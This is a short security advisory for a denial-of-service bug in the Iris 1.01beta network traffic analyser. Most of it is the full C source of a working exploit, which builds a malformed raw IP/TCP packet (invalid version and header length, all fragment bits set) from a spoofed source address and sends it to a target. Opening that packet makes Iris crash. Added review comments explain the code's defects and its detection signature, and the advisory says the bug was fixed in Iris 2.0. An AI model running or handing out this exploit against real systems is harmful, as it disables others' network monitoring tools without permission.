COMMAND
Iris
SYSTEMS AFFECTED
Iris 1.01beta
PROBLEM
Wouter ter Maat aka grazer found the following. There exists a
vulnerability that will cause the Iris network traffic analyser
to hang. The exploit demonstrates the bug: it sends
a packet to the remote host, and when the remote host opens the packet
(to examine it) Iris will quit, leaving an error message.
/* Denial of Service attack against :
* Iris The Network Traffic Analyzer beta 1.01
* ------------------------------------------------
*
* Will create an incorrect packet which will cause
* Iris to hang when it is opened by a user.
*
* Vulnerability found by : grazer@digit-labs.org
* Exploit code by : grazer@digit-labs.org
*
* Respect to the guys from eEye, for their fast
* response.
*
* greetings to hit2000, hwa, synnergy, security.is
* digit-labs.
*
* ---------------> free sk8!!!! <-----------------
*
* ------------------------------------------------
* http://www.digit-labs.org
* grazer@digit-labs.org
* ------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <sys/types.h>
#include <sys/socket.h>
/* Prototype for the packet builder defined below main(). */
int build_packet(int sfd, u_long srcaddr, u_long dstaddr);
/*
 * TCP pseudo-header, i.e. the prefix normally fed into the TCP checksum
 * computation. In this program it is never checksummed: build_packet()
 * places it in the send buffer directly behind the IP header, so its bytes
 * are what follows the IP header in the datagram that is sent.
 * NOTE(review): on LP64 platforms u_long is 8 bytes, so this struct is not
 * the classic 12-byte pseudo-header there; field order and types define the
 * byte layout and must not be changed.
 */
struct pseudo {
u_long saddr;      /* source address, network byte order (from inet_addr()) */
u_long daddr;      /* destination address, network byte order */
u_char zero;       /* normally 0; build_packet() stores 1 here */
u_char protocol;   /* IPPROTO_TCP */
u_short length;    /* htons(sizeof(struct tcphdr)) */
};
/*
 * Entry point. Usage: argv[1] = source address, argv[2] = destination
 * address, both expected as dotted-quad text since both go through
 * inet_addr(). Opens a raw IPPROTO_TCP socket with IP_HDRINCL (needs
 * root/CAP_NET_RAW, which the socket() failure message alludes to), calls
 * build_packet() once, closes the socket and returns 1.
 *
 * Review notes (defects left as written; they describe current behaviour):
 *  - `while (argc<3)` behaves as an `if`: the body exits unconditionally.
 *  - gethostbyname() is used only as an existence test. Its result is
 *    discarded and argv[2] is still passed to inet_addr(), so a hostname
 *    that resolves but is not numeric yields INADDR_NONE as the destination.
 *    `check` receives the result of the `== NULL` comparison (0 or 1), not a
 *    struct hostent pointer, because `==` binds tighter than `=`.
 *  - inet_addr() return values are never compared with INADDR_NONE.
 *  - setsockopt() is given optlen 1 instead of sizeof(one); its return value
 *    and build_packet()'s are ignored.
 *  - Every error path calls exit(0) (success status) while success returns 1.
 *  - raddr, ip and tcp are declared but never used.
 *  - inet_addr() is declared in <arpa/inet.h>, which is not included, so it
 *    is implicitly declared here (an error on recent compilers).
 */
int main(int argc,char **argv){
int rawfd, check, one=1;
struct sockaddr_in raddr;           /* unused */
struct in_addr source_ip, desti_ip;
struct ip *ip;                      /* unused */
struct tcphdr *tcp;                 /* unused */
/* Acts as an `if`: the body always exits. */
while (argc<3) {
fprintf(stderr, "\n\n[ IRIS DoS attack - by grazer ]");
fprintf(stderr, "\n %s localhost remotehost \n\n", argv[0] ); exit(0);}
fprintf(stderr, "\nStarting Iris DoS...\n");
/* Parses as check = (gethostbyname(argv[2]) == NULL); the hostent is dropped. */
if((check=gethostbyname(argv[2])==NULL)) {
fprintf(stderr, "\nCannot resolve host %s\n", argv[2]); exit(0); }
/* inet_addr() accepts numeric addresses only; INADDR_NONE on failure, unchecked. */
source_ip.s_addr= inet_addr(argv[1]);
desti_ip.s_addr = inet_addr(argv[2]);
if ((rawfd=socket(PF_INET, SOCK_RAW, IPPROTO_TCP))<0) {
fprintf(stderr, "\n You need root for this..");
exit(0); }
/* optlen is 1 rather than sizeof(one); return value ignored. */
setsockopt(rawfd, IPPROTO_IP, IP_HDRINCL, &one, 1);
build_packet(rawfd,source_ip.s_addr, desti_ip.s_addr);
close(rawfd);
return 1; }
/*
 * Builds one malformed IP datagram in a stack buffer and sends it once on
 * the raw socket sfd. srcaddr/dstaddr are already in network byte order
 * (they come from inet_addr() in main()). Always returns 1; the result of
 * sendto() is not checked.
 *
 * Buffer layout as written: [struct ip][struct pseudo][struct tcphdr].
 * Only sizeof(struct ip) + sizeof(struct tcphdr) bytes are handed to
 * sendto(), so what follows the IP header in the sent datagram is the
 * pseudo struct plus however much of the tcphdr region still fits. No
 * checksum is computed anywhere; the TCP checksum field stays 0 from bzero().
 *
 * What makes the packet invalid (grounded in the assignments below; this is
 * also what a capture of this tool looks like, which is what a detection
 * rule would key on):
 *  - ip_v and ip_hl are 4-bit fields, so -1 stores 0xF: IP version 15 and a
 *    claimed 60-byte header (15 * 4) in a datagram of
 *    sizeof(struct ip) + sizeof(struct tcphdr) bytes.
 *  - ip_id and ip_off are set to all ones (every fragment flag set and the
 *    maximum fragment offset).
 *  - ip_len is assigned without htons(); whether the kernel overwrites it
 *    under IP_HDRINCL is platform-dependent — not verifiable from here.
 *  - Ports, window and both checksums are left at zero by the bzero().
 *
 * Review notes:
 *  - bzero() is declared in <strings.h>, which is not included.
 *  - NOTE(review): whether `tcp->ack` names the 32-bit acknowledgement
 *    number or the 1-bit ACK flag depends on the libc's struct tcphdr
 *    naming scheme; with the Linux (non-BSD) names it is the flag bit and
 *    the htonl() value is truncated to one bit. Confirm against the headers.
 *  - rand() is never seeded, so seq/ack take the same values on every run.
 *  - src_inaddr/dest_inaddr exist only to copy the u_long values into
 *    struct in_addr; sin.sin_port is left 0.
 *  - The sendto() length is smaller than sizeof(packet), so there is no
 *    over-read of the stack buffer.
 */
int build_packet(int sfd, u_long srcaddr, u_long dstaddr) {
u_char packet[sizeof(struct ip) + sizeof(struct pseudo) + sizeof(struct tcphdr)];
struct sockaddr_in sin;
struct in_addr src_inaddr, dest_inaddr;
struct ip *ip = (struct ip *) packet;
struct pseudo *pseudo = (struct pseudo *) (packet + sizeof(struct ip));
struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct ip)
+ sizeof(struct pseudo));
/* Zero everything first: ports, window and checksums stay 0 below. */
bzero(packet, sizeof(packet));
bzero(&sin,sizeof(sin));
src_inaddr.s_addr = srcaddr;
dest_inaddr.s_addr = dstaddr;
pseudo->saddr = srcaddr;
pseudo->daddr = dstaddr;
pseudo->zero = 1;                    /* the "zero" byte is deliberately set to 1 */
pseudo->protocol=IPPROTO_TCP;
pseudo->length = htons(sizeof (struct tcphdr));
/* -1 into 4-bit fields -> 0xF; -1 into 16-bit fields -> 0xFFFF. */
ip->ip_v = -1;
ip->ip_hl = -1;
ip->ip_id = -1;
ip->ip_src = src_inaddr;
ip->ip_dst = dest_inaddr;
ip->ip_p = IPPROTO_TCP;
ip->ip_ttl = 40;
ip->ip_off = -1;
ip->ip_len = sizeof(struct ip) + sizeof(struct tcphdr);   /* host byte order, no htons() */
tcp->seq = htonl(rand());            /* unseeded rand(): deterministic per run */
tcp->ack = htonl(rand());            /* may be the 1-bit ACK flag, see note above */
sin.sin_family=AF_INET;
sin.sin_addr.s_addr=dstaddr;
/* Return value (bytes sent / -1 + errno) is discarded. */
sendto(sfd,packet,sizeof(struct ip) + sizeof(struct tcphdr), 0,
(struct sockaddr *) &sin,sizeof(sin));
fprintf(stderr, "\n Packet send... \n\n" );
return 1;}
The one thing to note is that someone has to actually click and
view the "evil" packet in order for Iris to crash. If you simply
open iris and start sniffing and receive the "evil" packet,
without clicking to view it, then Iris will not crash.
SOLUTION
This indeed is a bug in Iris 1.01 beta and it has been fixed
within Iris 2.0.